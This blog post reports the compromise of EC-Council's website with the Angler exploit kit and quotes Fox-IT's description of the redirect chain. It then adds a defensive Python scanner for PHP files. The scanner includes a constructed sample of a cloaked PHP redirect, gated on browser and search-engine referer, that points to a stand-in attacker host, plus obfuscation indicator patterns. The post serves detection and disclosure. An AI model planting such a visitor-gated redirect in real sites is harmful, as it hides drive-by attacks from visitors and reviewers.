Ransomware was found on the official website of EC-Council, the organization that runs the Certified Ethical Hacker program. After EC-Council did not reply to Fox-IT about the malware injected into its site, Fox-IT decided to go public with the news; an excerpt of its report can be read at the end of this blog post.
This Monday, malware was found on http://iclass.eccouncil.org/, the official website of EC-Council, a New Mexico-based professional organization that runs the Certified Ethical Hacker program.
Shortly after the malware was found, researchers from security firm Fox-IT notified EC-Council officials that one of their subdomains was under the control of an attacker who had injected Angler, a toolkit that provides powerful Web drive-by exploits.
On Thursday, after receiving no reply from EC-Council and still seeing that the website was infected, Fox-IT published a blog post stating that the company had failed to respond to them.
Unlike other drive-by attacks, this one is very hard for researchers to replicate. The exploit only targets visitors using Internet Explorer, and only when they arrive at the site from a search engine such as Google, Bing or Yahoo. Even when these conditions are met, visitors from certain IP addresses in certain geographic locales are also spared.
Here is an excerpt from the Fox-IT team:
Through this embedding the client is redirected a couple of times to avoid/frustrate/stop manual analysis and some automated systems. Once the user has jumped through all the redirects he/she ends up on the Angler exploit kit landing page from which the browser, flash player plugin or Silverlight plugin will be exploited. The Angler exploit kit first starts the ‘Bedep’ loader on an exploited victim machine which will download the final payload. The way the redirect occurs on the EC-COUNCIL website is through PHP code on the web server which is injecting the redirect into the web page. A vulnerability in the EC-COUNCIL website is most likely exploited as it runs the very popular WordPress CMS which has been a target through vulnerable plug-ins for years.
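The excerpt above describes a server-side PHP redirect that is shown only to selected visitors (Internet Explorer users arriving from a search engine). The following is an added example, not code from Fox-IT or from the compromised site, of a scanner a site owner could run over their own PHP files to flag that cloaking pattern: a redirect gated on the visitor's User-Agent or Referer. The sample PHP snippets are constructed for illustration and the indicator list is an assumption, not a complete signature set.

```python
import re

# Constructed sample of what an injected, visitor-gated redirect can look like in PHP.
# Illustrative only; this is not the actual code found on the EC-Council site.
INJECTED_PHP = """<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
$ref = $_SERVER['HTTP_REFERER'];
if (strpos($ua, 'MSIE') !== false && preg_match('/google|bing|yahoo/i', $ref)) {
    header('Location: http://attacker-landing.invalid/');
    exit;
}
?>"""

# Constructed sample of a legitimate, unconditional redirect for comparison.
CLEAN_PHP = """<?php
if (isset($_GET['page']) && $_GET['page'] === 'old') {
    header('Location: /new');
    exit;
}
?>"""

# Indicator regexes (assumed list, chosen to match the behaviour the report describes).
INDICATORS = {
    "user_agent_check": re.compile(r"HTTP_USER_AGENT", re.I),
    "referer_check": re.compile(r"HTTP_REFERER", re.I),
    "search_engine_match": re.compile(r"google|bing|yahoo", re.I),
    "ie_match": re.compile(r"\bMSIE\b|Trident", re.I),
    "redirect": re.compile(r"header\s*\(\s*['\"]Location:|<meta[^>]+http-equiv=['\"]refresh", re.I),
    "obfuscation": re.compile(r"base64_decode|eval\s*\(|gzinflate|str_rot13", re.I),
}


def scan_php(source):
    """Return which indicators fire and whether the file looks like a cloaked redirect."""
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}
    # A redirect by itself is normal; a redirect that depends on the visitor's browser
    # or on where they came from is the cloaking pattern used to hide a drive-by landing page.
    gated = hits["redirect"] and (hits["user_agent_check"] or hits["referer_check"])
    suspicious = gated and (hits["search_engine_match"] or hits["ie_match"] or hits["obfuscation"])
    return {"suspicious": suspicious, "hits": hits}


if __name__ == "__main__":
    for label, src in (("injected", INJECTED_PHP), ("clean", CLEAN_PHP)):
        print(label, scan_php(src)["suspicious"])
```

Run it against a directory of PHP files by reading each file into `scan_php`; a hit is a starting point for manual review, since some legitimate geo or mobile redirects also inspect request headers.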